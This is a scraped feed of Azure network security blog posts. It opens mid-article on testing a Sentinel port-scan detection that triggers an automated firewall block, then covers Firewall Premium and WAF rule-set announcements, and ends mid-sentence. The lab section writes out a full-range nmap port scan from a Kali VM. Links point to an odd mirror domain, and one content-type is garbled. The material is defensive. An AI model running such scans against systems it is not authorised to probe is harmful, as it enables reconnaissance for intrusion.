Workbook to visualize the Azure Firewall log data, use Hunting queries to identify uncommon/anomalous patterns and create incidents with the enabled detection rules.&nbsp; You can also automate response for any Azure Firewall detections using the available Azure Sentinel Playbooks.</P> <P>&nbsp;</P> <P><FONT size="2"><STRONG>Reference</STRONG>: </FONT><EM><A href="#" target="_blank" rel="noopener"><FONT size="2">Detect threats with built-in analytics rules in Azure Sentinel | Microsoft Docs</FONT></A></EM></P> <H2>&nbsp;</H2> <P>&nbsp;</P> <P>&nbsp;</P> <H2>Testing Detection Rule with Playbook for Automated Response (includes Demo)</H2> <P>&nbsp;</P> <P>In this section, we will use an example scenario to walk you through the steps involved in configuring and testing one of the detections included in the Azure Firewall Solution and respond to it by making the desired update to the Azure Firewall configuration automatically, with one of the Playbooks also included in the solution.&nbsp; To provide learning aid, a <STRONG>prerecorded end to end demonstration for the scenario is also available at end of this section</STRONG>.&nbsp; The instructions preceding the demo video are to assist you in setting up and configuring your environment so you can follow along and perform testing based on the scenario outlined below.&nbsp; We encourage you to follow the step by step process in this section to gain familiarity with key concepts and configuration requirements.<EM>&nbsp; </EM></P> <P>&nbsp;</P> <P>In the following Example Scenario, you will use the <STRONG>Port Scan</STRONG> rule provided in the solution to detect scanning activity and respond to it automatically using the <STRONG>AzureFirewall-BlockIP-addToIPGroup</STRONG> Playbook.&nbsp; In this scenario, upon successful detection of a port scan, an incident will be created in Azure Sentinel.&nbsp; The Playbook will be triggered by the Azure Sentinel Automation Rule which will allow you to add the IP address of the port scanner (source host) to an IP Group used in a deny network rule on Azure Firewall to block traffic from the port scanner.</P> <H2>&nbsp;</H2> <P>&nbsp;</P> <H3>Example Scenario</H3> <P>&nbsp;</P> <P>To test the Port Scan detection and automated response capability, you will need a test environment with:</P> <P>&nbsp;</P> <OL> <LI>2 Virtual Machines in separate Spoke VNETs in Azure</LI> <LI>A Hub VNET with Azure Firewall Standard or Premium which has <UL> <LI>An Allow Network rule to allow all traffic between the 2 Spoke VNETs</LI> <LI>A Deny Network rule collection with a Network rule which uses IP Group as the source</LI> </UL> </LI> <LI>Ensure that the 2 VMs in Spoke VNETs communicate with each other through the Azure Firewall <UL> <LI>This can be accomplished by peering the 2 Spoke VNETs where the VMs live with the Hub VNET with Azure Firewall</LI> <LI>User Defined Routes (UDRs) on the Spoke Subnets to ensure that all traffic from the VMs is routed through the Azure Firewall</LI> </UL> </LI> <LI>Azure Sentinel workspace with Azure Firewall Solution deployed and Azure Firewall Connector and Playbooks configured correctly</LI> </OL> <P>&nbsp;</P> <P>Here is a diagram of an example setup.&nbsp; We will be using this setup as reference for the remainder of this document.<BR /><BR /></P> <P>&nbsp;</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Mohit_Kumar_0-1629999089802.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/306066iA4B98BFC0BCE1034/image-size/large?v=v2&amp;px=999" role="button" title="Mohit_Kumar_0-1629999089802.png" alt="Mohit_Kumar_0-1629999089802.png" /></span></P> <H2>&nbsp;</H2> <P>&nbsp;</P> <H3>Configuration Requirements in Example Scenario</H3> <P>&nbsp;</P> <P>Before you can begin testing, please follow the instructions below to ensure Azure Firewall, Azure Firewall Connector and Playbooks (automation) and Azure Sentinel are ready:</P> <H2>&nbsp;</H2> <P>&nbsp;</P> <H4>Azure Firewall</H4> <P>&nbsp;</P> <P>Please ensure that your Azure Firewall has the following configurations:</P> <P>&nbsp;</P> <OL> <LI>An existing <STRONG>IP Group</STRONG> which will contain IP addresses to be blocked by Azure Firewall</LI> <LI>An existing <STRONG>Deny Network Rule Collection</STRONG> which is processed before other Allow Network Rule Collections</LI> <LI>An existing <STRONG>Network Rule</STRONG> in the Deny Network Rule Collection which uses the IP Group from Step 1 for Source</LI> </OL> <H2>&nbsp;</H2> <P>&nbsp;</P> <H4>Azure Firewall Connector and Playbooks</H4> <P>&nbsp;</P> <P>Please ensure that the Azure Firewall Custom Logic App Connector and Playbooks Templates are configured correctly as described in the detailed step by step guide available here <A href="https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/automated-detection-and-response-for-azure-firewall-with-the-new/ba-p/2414224" target="_blank" rel="noopener">Automated Detection and Response for Azure Firewall with the New Logic App Connector and Playbooks</A><SPAN>.</SPAN></P> <H2>&nbsp;</H2> <P>&nbsp;</P> <H4>Azure Sentinel</H4> <P>&nbsp;</P> <P>Please follow the instructions below to configure the Port Scan detection rule and create an automation rule in Azure Sentinel.&nbsp;</P> <P>&nbsp;</P> <OL> <LI>Click to select the <STRONG>Port Scan</STRONG> rule and then click the <STRONG>Edit </STRONG>button</LI> <LI>Click <STRONG>Next: Set rule logic </STRONG>button in the <STRONG>General tab</STRONG></LI> <LI>Edit the port scan detection logic in the <STRONG>Rule query</STRONG> pane</LI> <LI>By default, this rule looks for port scan attempts made 24 hours ago.&nbsp; To immediately see detection and automated response for a port scan you will be simulating, modify the rule by commenting out the following line in the query<BR /><BR /><LI-CODE lang="json">//| where TimeGenerated between (ago(StartRunTime) .. ago(EndRunTime))​</LI-CODE> <P>&nbsp;</P> <BR /><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Mohit_Kumar_3-1629995083899.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/306039i92663C2FF001696A/image-size/large?v=v2&amp;px=999" role="button" title="Mohit_Kumar_3-1629995083899.png" alt="Mohit_Kumar_3-1629995083899.png" /></span></LI> </OL> <P>&nbsp;</P> <OL start="5"> <LI>Click on the <STRONG>Next: Incident settings </STRONG>button</LI> <LI>In the <STRONG>Incident settings</STRONG> tab, click on the <STRONG>Next: Automated response </STRONG>button</LI> <LI>In the <STRONG>Automated response </STRONG>tab, create a new <STRONG>Automation Rule</STRONG> and attach it to the <STRONG>Port Scan </STRONG>detection rule<BR /> <OL class="lia-list-style-type-lower-alpha"> <LI>Click the <STRONG>Add new </STRONG>button in the <STRONG>Incident automation </STRONG>pane</LI> <LI>Add a name for the rule in the <STRONG>Automation rule name </STRONG>field</LI> <LI>Ensure that the <STRONG>Trigger </STRONG>is set to <EM>When incident is created</EM></LI> <LI>In <STRONG>Conditions</STRONG>, click to select <STRONG>If Analytic rule name</STRONG> <EM>contains</EM> <EM>Port Scan</EM> or <EM>Current rule</EM></LI> <LI>Under <STRONG>Actions</STRONG>, select <EM>Run playbook </EM>from the drop-down menu</LI> <LI>Select the <STRONG>AzureFirewall-BlockIP-addToIPGroup</STRONG> Playbook from the second drop-down under <STRONG>Actions</STRONG></LI> <LI>Select appropriate Date/time in <STRONG>Rule expiration</STRONG></LI> <LI>Click on the <STRONG>Apply </STRONG>button to create the Automation Rule</LI> </OL> </LI> <LI>Click on the <STRONG>Next: Review</STRONG> button in the <STRONG>Automated Response</STRONG> tab</LI> <LI>Click on the <STRONG>Save</STRONG> button in the <STRONG>Review and create </STRONG>tab to finish rule configuration</LI> </OL> <P>&nbsp;</P> <P>Please see the screen capture below for a step-by-step process to modify the Port Scan detection rule and create an Automation rule in Azure Sentinel.<BR /><BR /></P> <P>&nbsp;</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="ConfigureDetectionandAutomationRule-RAW-Edited2-Final.gif" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/306062iD47D187AD5CCBB52/image-size/large?v=v2&amp;px=999" role="button" title="ConfigureDetectionandAutomationRule-RAW-Edited2-Final.gif" alt="Modifying the Port Scan Detection Rule and creating an Automation Rule" /><span class="lia-inline-image-caption" onclick="event.preventDefault();">Modifying the Port Scan Detection Rule and creating an Automation Rule</span></span></P> <H2>&nbsp;</H2> <P>&nbsp;</P> <H3>Testing Automated Detection and Response in Example Scenario</H3> <P>&nbsp;</P> <P>In the example test setup depicted above, we have a Hub VNET with an Azure Firewall and 2 Spoke VNETs; Client Spoke which has a Kali Linux VM and a Server Spoke which has a Windows Server 2019 VM.&nbsp; The 2 Spoke VNETs do not have direct connectivity with each other however, both are peered with the Hub VNET and point to Azure Firewall for internet and VNET to VNET connectivity with a UDR (User Defined Route).&nbsp; Azure Firewall has a Network Rule to allow all traffic from Client Spoke VNET to the Server Spoke VNET.&nbsp; We have 2 Network rules in Azure Firewall:<BR /><BR /></P> <UL> <LI>A lower priority rule allows all traffic (all ports and protocols) between the Client and Server Spokes</LI> <LI>A higher priority rule denies all traffic from IP Group used as the source<BR /><BR /><STRONG>Note</STRONG>: <EM>A higher priority rule is processed before a lower priority rule in Azure Firewall<BR /><BR /></EM></LI> </UL> <P>We have deployed the Azure Firewall Solution to the Azure Sentinel Workspace and configured the Azure Firewall Connector + Playbooks in this environment.&nbsp; As described in the previous section (Configuration Requirements in Example Scenario), we have enabled and configured the Port Scan detection rule along with an Automation Rule to trigger the AzureFirewall-BlockIP-addToIPGroup Playbook.&nbsp; To start the automated detection and response process, we initiate a port scan from the Kali Linux VM in the Client Spoke VNET to the Windows 2019 VM in the Server Spoke VNET using the following command: <STRONG>nmap -Pn -p 1-65535 -v &lt;IP address of the Windows Server 2019 VM&gt;</STRONG>&nbsp;</P> <P>&nbsp;</P> <P>Please review the following section to understand all the steps in the automated detection and response flow.</P> <H2><STRONG>&nbsp;</STRONG></H2> <P>&nbsp;</P> <H3>How Automated Detection and Response Worked in Example Scenario</H3> <P><STRONG>&nbsp;</STRONG></P> <P>The diagram below depicts the end-to-end process starting from the time a port scan is initiated, the Azure Firewall Playbook is triggered based on the detection rule and the IP Group used in the Deny Network Rule in Azure Firewall is updated with the IP address of the port scanner (Kali VM).&nbsp; All the steps are called out in the diagram and explained below.</P> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Mohit_Kumar_5-1629995230036.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/306044i2A62AFAA379D6B63/image-size/large?v=v2&amp;px=999" role="button" title="Mohit_Kumar_5-1629995230036.png" alt="Mohit_Kumar_5-1629995230036.png" /></span></P> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <OL> <LI>Port scan is initiated from the Kali Linux VM in the Client Spoke to the Windows Server 2019 VM in the Server Spoke</LI> <LI>The traffic is routed through the Hub VNET where Azure Firewall processes and allows the traffic based on the Network Rule definition</LI> <LI>Port scan traffic from the Kali Linux VM in the Client Spoke reaches the Windows Server 2019 VM in the Server Spoke</LI> <LI>Azure Firewall logs traffic details to the Log Analytics workspace in the Network Rule Log</LI> <LI>Azure Firewall log data is ingested by Azure Sentinel using the Azure Firewall Data Connector<BR /> <UL> <LI>Port Scan detection rules in Azure Sentinel analyzes the log data for pattern representing port scan activity</LI> <LI>When traffic pattern in the log is matched for port scan activity, an Azure Sentinel Incident is created</LI> <LI>The automation rule attached to the Port Scan detection rule triggers the AzureFirewall-BlockIP-addToIPGroup Playbook</LI> </UL> </LI> <LI>The AzureFirewall-BlockIP-addToIPGroup Playbook sends an adaptive notification in the Microsoft Teams Channel defined in its configuration</LI> <LI>The analyst triaging the incident notification decides to act by adding the IP address of the port scanner host (Kali VM) identified in the notification, to the IP Group used in the deny rule on Azure Firewall<BR /> <UL> <LI>The Playbook updates the Azure Sentinel Incident with details of action taken</LI> </UL> </LI> <LI>The Playbook send the action taken by the analyst to the Azure Firewall Connector</LI> <LI>The Firewall Connector updates the Azure Firewall configuration by adding the IP address of the port scanner to the IP Group used in the Deny Network rule</LI> </OL> <P>&nbsp;</P> <P>Please watch the prerecorded demo below, which shows how to simulate a port scan and walks you through the automated detection and response process in our example scenario.</P> <H2>&nbsp;</H2> <P>&nbsp;</P> <P>&nbsp;</P> <H2>Demo</H2> <P>&nbsp;</P> <P>In this video, we go over the demo environment setup, configuration of Azure Firewall and Azure Sentinel in the demo environment and provide end-to-end demonstration for triggering the automated detection and response process described in the previous section.<BR /><BR /></P> <P>&nbsp;</P> <P>&nbsp;</P> <H2><LI-VIDEO vid="https://www.youtube.com/watch?v=6INoWbm6UYs" align="center" size="medium" width="400" height="225" uploading="false" thumbnail="https://i.ytimg.com/vi/6INoWbm6UYs/hqdefault.jpg" external="url"></LI-VIDEO></H2> <H2>&nbsp;</H2> <P>&nbsp;</P> <P>&nbsp;</P> <H2>Summary</H2> <P>&nbsp;</P> <P>The Azure Firewall Solution provides net new detections, hunting queries, workbook and response automation which allow you to detect prevalent techniques used by attackers and malware.&nbsp; The Solution provides a streamlined method to deploy all packaged components at once with minimal overhead and start utilizing them in your environment.&nbsp; We encourage all customers to utilize these new detection and automation capabilities to help improve your overall security posture.</P> <P>&nbsp;</P> <P>We will continue to enhance the firewall solution in the future with new detection and automation capabilities to meet your needs.&nbsp; You can also contribute new connectors, playbooks, detections, workbooks, analytics and more for Azure Firewall in Azure Sentinel. &nbsp;Get started now by joining the&nbsp;<A href="#" target="_blank" rel="noopener">Azure Network Security</A>&nbsp;plus&nbsp;<A href="#" target="_blank" rel="noopener">Azure Sentinel Threat Hunters</A>&nbsp;communities on GitHub and following the guidance.</P> <H2>&nbsp;</H2> <P>&nbsp;</P> <P>&nbsp;</P> <H2>Additional Resources</H2> <P>&nbsp;</P> <UL> <LI>To learn more about Azure Firewall, visit:&nbsp;&nbsp;<A href="#" target="_blank" rel="noopener">https://aka.ms/AzNetSecNinja</A></LI> <LI>To learn more about Azure Sentinel, visit:&nbsp;&nbsp;<A href="#" target="_blank" rel="noopener">http://aka.ms/ninjatraining</A></LI> <LI>To learn more about Automation Rules and Playbooks, visit: <UL> <LI><A href="#" target="_blank" rel="noopener">Automate incident handling in Azure Sentinel</A></LI> <LI><A href="#" target="_blank" rel="noopener">Automate threat response with playbooks in Azure Sentinel</A></LI> <LI><A href="#" target="_blank" rel="noopener">Tutorial: Use playbooks with automation rules in Azure Sentinel</A></LI> </UL> </LI> </UL> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> Tue, 07 Sep 2021 19:05:47 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/new-detections-hunting-queries-and-response-automation-in-azure/ba-p/2688746 Mohit_Kumar 2021-09-07T19:05:47Z Azure Firewall Premium now in General Availability https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/azure-firewall-premium-now-in-general-availability/ba-p/2633409 <P>Azure Firewall premium is now generally available for <A href="#" target="_blank" rel="noopener">most Azure regions</A>. Thank you to community members who participated in both the private and public previews. This SKU is compatible in a Virtual WAN Hub (Secure Virtual Hub), and Hub Virtual Network scenarios.</P> <P>The Azure Firewall Premium SKU utilizes a more powerful compute engine for advanced content filtering and threat protection through IDPS. The Premium SKU can seamlessly scale up to 30 Gbps and integrates with availability zones to support the service level agreement (SLA) of 99.99 percent.&nbsp;</P> <P>It provides <A href="#" target="_self">Threat intelligence-based filtering</A> for both encrypted and non-encrypted traffic and Intrusion detection and prevention for all ports and protocols as a managed service to our customers, with support for hybrid connectivity through deployment behind VPN and ExpressRoute Gateways.</P> <P>&nbsp;</P> <P>All new <A href="#" target="_self">features of the Firewall premium</A> SKU will be configurable via <A href="#" target="_self">Firewall Policy</A> only. Azure firewall infrastructure features ported from Azure Firewall Standard and Classic rules such as Threat Intelligence and Custom DNS, including new features such as TLS inspection and Web categories etc. can all be managed via Azure Firewall premium policy SKU.</P> <P>The Premium SKU complies with Payment Card Industry Data Security Standard (PCI DSS) environment needs and is ICSA labs certified.</P> <P>&nbsp;</P> <P class="lia-indent-padding-left-300px"><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="tobiotolorin_0-1628620276262.png" style="width: 436px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/302216i1FDD71E741B7C068/image-dimensions/436x391?v=v2" width="436" height="391" role="button" title="tobiotolorin_0-1628620276262.png" alt="tobiotolorin_0-1628620276262.png" /></span></P> <P class="lia-indent-padding-left-60px">&nbsp;</P> <OL> <LI><A href="#" target="_blank" rel="noopener"><STRONG><EM>Transport Layer Security (TLS) Inspection</EM></STRONG></A><EM>: Azure Firewall Premium decrypts outbound East-West TLS connections</EM><EM>, performs the required value-added security functions and re-encrypts the traffic which is sent to the original destination.</EM></LI> <LI><A href="#" target="_blank" rel="noopener"><STRONG><EM>Intrusion Detection and Prevention System (IDPS)</EM></STRONG></A><STRONG><EM>:</EM></STRONG><EM> Azure Firewall Premium provides signature based IDPS to allow rapid detection of attacks by looking for specific patterns, such as byte sequences in network traffic, or known malicious instruction sequences used by malware.</EM></LI> <LI><A href="#" target="_blank" rel="noopener"><STRONG><EM>Web Categories</EM></STRONG></A><EM>: Allows administrators to allow or deny user access to the Internet based on categories (e.g., social networking, search engines, gambling), reducing the time spent on managing individual FQDNs and URLs. This capability is also available for Azure Firewall Standard based on FQDNs only.</EM></LI> <LI><A href="#" target="_blank" rel="noopener"><STRONG><EM>URL Filtering</EM></STRONG></A><EM>: TLS inspection enables filtering beyond the FQDN root domain and allow users to access specific URLs for both plain text and encrypted traffic, typically being used in conjunction with web categories.</EM></LI> </OL> <P>&nbsp;</P> <P class="lia-indent-padding-left-30px">By using Firewall Policy, you can achieve central management of your firewalls using Azure Firewall Manager. Firewall Rules (Classic) continues to be supported and can be used for configuring existing features of Standard Firewall. Firewall Policy can be managed independently or by using Azure Firewall manager.</P> <P class="lia-indent-padding-left-270px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="tobiotolorin_0-1628621692989.png" style="width: 619px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/302222i1EC4C93583DA3B77/image-dimensions/619x407?v=v2" width="619" height="407" role="button" title="tobiotolorin_0-1628621692989.png" alt="tobiotolorin_0-1628621692989.png" /></span></P> <P><STRONG><EM>Migrating to the new Firewall Premium SKU</EM></STRONG><BR />To migrate your existing Azure firewall standard policy to Premium policy, you connect to your Azure account, retrieve the existing policy and modify the parameters by adding the features required for a premium firewall policy to the existing firewall policy image. The existing firewall instance is then deleted as you create a new one with the premium features. &nbsp;The new instance is compute intensive due to the TLS inspection and IDPS actions, hence the Azure firewall premium SKU is deployed with a more powerful compute engine.</P> <P>&nbsp;</P> <P>&nbsp;</P> <LI-CODE lang="json">$NewPolicyParameters = @{ Name =(GetPolicyNewName -Policy $Policy) ResourceGroupName = $Policy.ResourceGroupName Location = $Policy.Location ThreatIntelMode = $Policy.ThreatIntelMode BasePolicy = $Policy.BasePolicy DnsSetting = $Policy.DnsSettings Tag = $Policy.Tag SkuTier = "Premium" } </LI-CODE> <P>&nbsp;</P> <P>&nbsp;</P> <P>You can follow the detailed step by step guide in <A href="#" target="_blank" rel="noopener">Azure firewall Premium migration.</A> Once deployed, you can test and <A href="#" target="_blank" rel="noopener">validate the different Premium features</A><SPAN>.</SPAN></P> <P>&nbsp;</P> <P>&nbsp;</P> <P>Some helpful use case scenarios and reference architectures for Azure Firewall Premium :</P> <P><EM>* <A href="https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/how-to-use-azure-firewall-premium-with-wvd/ba-p/2148402" target="_blank" rel="noopener">How to use Azure Firewall Premium with WVD</A></EM></P> <P><EM>* <A href="https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/certificate-management-overview-for-azure-firewall-premium-tls/ba-p/2214763" target="_blank" rel="noopener">Certificate Management for Azure Firewall Premium TLS Inspection</A></EM></P> <P><EM>* <A href="#" target="_blank" rel="noopener">Deep dive video on Azure Firewall Standard and Premium SKU</A></EM></P> <P><EM>* <A href="#" target="_self">Azure Firewall Monitor Workbook with Premium feature logs.</A></EM></P> <P><EM>* <A href="#" target="_blank" rel="noopener">Getting started with Azure Firewall Manager</A></EM></P> <P><EM>* <A href="#" target="_blank" rel="noopener">Content Inspection Using TLS Termination with Azure Firewall Premium</A></EM></P> <P>&nbsp;</P> <P>For more information, see the&nbsp;<A href="#" target="_blank" rel="noopener"><EM>Azure Firewall Premium documentation</EM></A></P> <P>&nbsp;</P> Wed, 18 Aug 2021 15:12:48 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/azure-firewall-premium-now-in-general-availability/ba-p/2633409 tobiotolorin 2021-08-18T15:12:48Z New Managed Rule Set on Azure WAF for Front Door Premium https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/new-managed-rule-set-on-azure-waf-for-front-door-premium/ba-p/2628959 <P><FONT size="4">A new managed rule set called&nbsp;<EM><STRONG>Microsoft_DefaultRuleSet_2.0</STRONG></EM>&nbsp;has been launched in public preview on Azure Web Application Firewall (WAF)&nbsp;for&nbsp;Front Door Premium.&nbsp;To simplify, we often refer&nbsp;to this rule set as&nbsp;<EM><STRONG>DRS 2.0</STRONG></EM>.&nbsp;</FONT></P> <P>&nbsp;</P> <P><FONT size="4">The new managed rule set&nbsp;offers&nbsp;enhanced rule definitions to&nbsp;help reduce false positives,&nbsp;additional&nbsp;managed rules to detect and protect against&nbsp;more&nbsp;web application attacks, anomaly scoring mode and&nbsp;support for&nbsp;additional&nbsp;content-types.&nbsp;</FONT></P> <P>&nbsp;</P> <P>&nbsp;</P> <P class="lia-indent-padding-left-360px"><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="camilamartins_0-1628536692380.png" style="width: 400px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/301876iC6F68FB3FB522B8E/image-size/medium?v=v2&amp;px=400" role="button" title="camilamartins_0-1628536692380.png" alt="camilamartins_0-1628536692380.png" /></span></P> <P>&nbsp;</P> <P>&nbsp;</P> <P><FONT size="4"><STRONG>What are the requirements to use&nbsp;DRS 2.0?&nbsp;</STRONG></FONT></P> <P><FONT size="4">You must be using Azure&nbsp;Front Door Premium SKU*.&nbsp;&nbsp;</FONT></P> <P>&nbsp;</P> <P><FONT size="2" color="#333333"><EM>*Note:&nbsp;Azure Front Door Premium&nbsp;(which includes DRS 2.0) is currently in Public Preview status. We do not recommend using&nbsp;this&nbsp;version&nbsp;on production workloads until it becomes Generally Available (GA). This is a great time to invest in a proof of concept or testing, though.</EM></FONT></P> <P>&nbsp;</P> <P><STRONG><FONT size="4">What&nbsp;changes when&nbsp;using&nbsp;DRS 2.0?&nbsp;</FONT></STRONG></P> <P><FONT size="4">DRS 2.0 introduces updated rule definitions, Microsoft Threat Intelligence rules, anomaly scoring mode, and additional content-type support. </FONT></P> <P>&nbsp;</P> <P><FONT size="4">Let's talk a little more about each one of these items:</FONT></P> <P>&nbsp;</P> <P class="lia-indent-padding-left-30px"><FONT color="#0000FF"><STRONG><FONT size="4">Updated&nbsp;Rule Definitions&nbsp;</FONT></STRONG></FONT></P> <P class="lia-indent-padding-left-30px"><FONT size="4">Our managed rules that protect against the most common&nbsp;web application attacks, such as the OWASP Top 10, are based on&nbsp;OWASP&nbsp;ModSecurity&nbsp;Core Rule Set&nbsp;(CRS). In DRS&nbsp;2.0, the definitions were updated based on version CRS 3.2.&nbsp;&nbsp;</FONT></P> <P class="lia-indent-padding-left-30px">&nbsp;</P> <P class="lia-indent-padding-left-30px"><FONT size="4">CRS 3.2 has several improvements in comparison to the previous CRS versions. Multiple security rules have received fixes that help lower the occurrence of false positives, and new security rules have been added to detect and protect against more threats, such&nbsp;as&nbsp;new&nbsp;types of&nbsp;Cross-Site Scripting (XSS)&nbsp;and&nbsp;SQL Injection (SQLi)&nbsp;attacks. </FONT></P> <P class="lia-indent-padding-left-30px">&nbsp;</P> <P class="lia-indent-padding-left-30px"><FONT size="4">For more detailed information on what changed from CRS 3.1 to CRS 3.2, you can refer to the&nbsp;<A href="#" target="_blank" rel="noopener">OWASP ModSecurity Core Rule Set Version 3.2.0 change log</A>.&nbsp;</FONT></P> <P class="lia-indent-padding-left-30px">&nbsp;</P> <P>&nbsp;</P> <P class="lia-indent-padding-left-90px"><FONT size="4"><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="camilamartins_1-1628536692409.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/301878iC13DDC5B4943CE85/image-size/large?v=v2&amp;px=999" role="button" title="camilamartins_1-1628536692409.png" alt="camilamartins_1-1628536692409.png" /></span></FONT></P> <P>&nbsp;</P> <P class="lia-indent-padding-left-30px">&nbsp;</P> <P class="lia-indent-padding-left-30px"><BR /><FONT color="#0000FF"><STRONG><FONT size="4">Microsoft Threat Intelligence Rules&nbsp;</FONT></STRONG></FONT></P> <P class="lia-indent-padding-left-30px"><FONT size="4">We have added our own Microsoft-authored security rules. These rules were created&nbsp;by&nbsp;the&nbsp;Microsoft Threat Intelligence Center (MSTIC)&nbsp;team based on signatures developed internally and are not open-sourced.&nbsp;</FONT></P> <P class="lia-indent-padding-left-30px">&nbsp;</P> <P class="lia-indent-padding-left-30px">&nbsp;</P> <P class="lia-indent-padding-left-90px"><FONT size="4"><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="camilamartins_2-1628536692436.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/301877i2E06C7C469AFBD43/image-size/large?v=v2&amp;px=999" role="button" title="camilamartins_2-1628536692436.png" alt="camilamartins_2-1628536692436.png" /></span></FONT></P> <P>&nbsp;</P> <P>&nbsp;</P> <P class="lia-indent-padding-left-30px"><FONT color="#0000FF"><STRONG><FONT size="4">Anomaly Scoring Mode&nbsp;</FONT></STRONG></FONT></P> <P class="lia-indent-padding-left-30px"><FONT size="4">Previous versions of the managed rule sets in Azure WAF for&nbsp;Front Door&nbsp;follow the “Traditional&nbsp;Mode” for threat response. This means that&nbsp;as soon as an HTTP request matches a rule,&nbsp;the WAF takes the configured action&nbsp;(allow, block, log, or redirect)&nbsp;and no further rules are processed. It has a binary "match-or-not-match" approach.&nbsp;This mode is easy to understand, but it&nbsp;lacks&nbsp;information about how many rules&nbsp;a&nbsp;specific&nbsp;HTTP&nbsp;request&nbsp;would match.&nbsp;</FONT></P> <P class="lia-indent-padding-left-30px">&nbsp;</P> <P class="lia-indent-padding-left-30px"><FONT size="4">In DRS 2.0, the&nbsp;Azure WAF runs in “Anomaly Scoring Mode”.&nbsp;This means that&nbsp;an HTTP request gets inspected by all rules in the rule set,&nbsp;each rule has a specific severity level,&nbsp;and&nbsp;points&nbsp;are assigned based on the criticality of each rule.&nbsp;The&nbsp;WAF adds up&nbsp;these points, and if they reach the anomaly scoring threshold, then&nbsp;the WAF takes the configured action (block, log, or redirect.&nbsp;</FONT></P> <P class="lia-indent-padding-left-30px">&nbsp;</P> <P class="lia-indent-padding-left-30px"><FONT size="4">Anomaly Scoring Mode allows&nbsp;analysts and administrators to get a holistic view of the attack, as the WAF will log&nbsp;all&nbsp;matches for a single&nbsp;HTTP&nbsp;request. It also&nbsp;helps improve the rates of false positives because it blocks requests based on severity levels and anomaly thresholds, instead of a simpler binary approach.&nbsp;</FONT></P> <P class="lia-indent-padding-left-330px"><FONT size="4"><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="camilamartins_3-1628536692438.png" style="width: 400px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/301879i205945AF340A04CD/image-size/medium?v=v2&amp;px=400" role="button" title="camilamartins_3-1628536692438.png" alt="camilamartins_3-1628536692438.png" /></span></FONT></P> <P>&nbsp;</P> <P>&nbsp;</P> <P class="lia-indent-padding-left-30px"><FONT color="#0000FF"><STRONG><FONT size="4">Additional Content-Type&nbsp;Support&nbsp;</FONT></STRONG></FONT></P> <P class="lia-indent-padding-left-30px"><FONT size="4">DRS 2.0&nbsp;supports&nbsp;additional Content-Types&nbsp;for HTTP request body inspection. Azure WAF&nbsp;for Front Door&nbsp;can inspect&nbsp;HTTP request body&nbsp;sizes&nbsp;up to&nbsp;128KB. If requests are&nbsp;larger than 128KB, the&nbsp;WAF will stop inspection at that limit&nbsp;mark.&nbsp;</FONT></P> <P class="lia-indent-padding-left-30px">&nbsp;</P> <P class="lia-indent-padding-left-30px"><FONT size="4">The supported Content-Types&nbsp;when using&nbsp;the DRS 2.0 managed rule set are:&nbsp;</FONT></P> <P class="lia-indent-padding-left-30px">&nbsp;</P> <UL> <LI class="lia-indent-padding-left-30px"><FONT size="4">applicationhttps://techcommunity.microsoft.com/json&nbsp;</FONT></LI> <LI class="lia-indent-padding-left-30px"><FONT size="4">application/xml&nbsp;</FONT></LI> <LI class="lia-indent-padding-left-30px"><FONT size="4">application/x-www-form-urlencoded&nbsp;</FONT></LI> <LI class="lia-indent-padding-left-30px"><FONT size="4">multipart/form-data&nbsp;</FONT></LI> </UL> Wed, 11 Aug 2021 16:32:18 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/new-managed-rule-set-on-azure-waf-for-front-door-premium/ba-p/2628959 camilamartins 2021-08-11T16:32:18Z New Improvements on Azure WAF for Application Gateway https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/new-improvements-on-azure-waf-for-application-gateway/ba-p/2572257 <P>A new managed rule set called <STRONG><EM>OWASP_3.2</EM></STRONG> has been launched in public preview on Azure WAF for Application Gateway. This rule set is based on OWASP ModSecurity Core Rule Set (CRS), which intends to protect web applications from the most common attacks, such as the OWASP Top 10. We often refer to the <STRONG><EM>OWASP_3.2</EM></STRONG> rule set interchangeably with <STRONG><EM>CRS 3.2</EM></STRONG>.</P> <P>&nbsp;</P> <P><FONT size="4"><STRONG>What are the requirements to use CRS 3.2?</STRONG></FONT></P> <P>You must be using Azure Application Gateway WAF_v2 SKU, and you must be using WAF Policy to manage your Azure WAF settings.</P> <P>&nbsp;</P> <P><FONT size="4"><STRONG>What changes when enabling CRS 3.2?</STRONG></FONT></P> <P>With the new WAF engine, you will receive the following benefits:</P> <P>&nbsp;</P> <P><FONT size="4" color="#333399"><STRONG>Reduced false positives and added security rules</STRONG></FONT></P> <P>CRS 3.2 has several improvements in comparison to the previous CRS versions. Multiple security rules have received 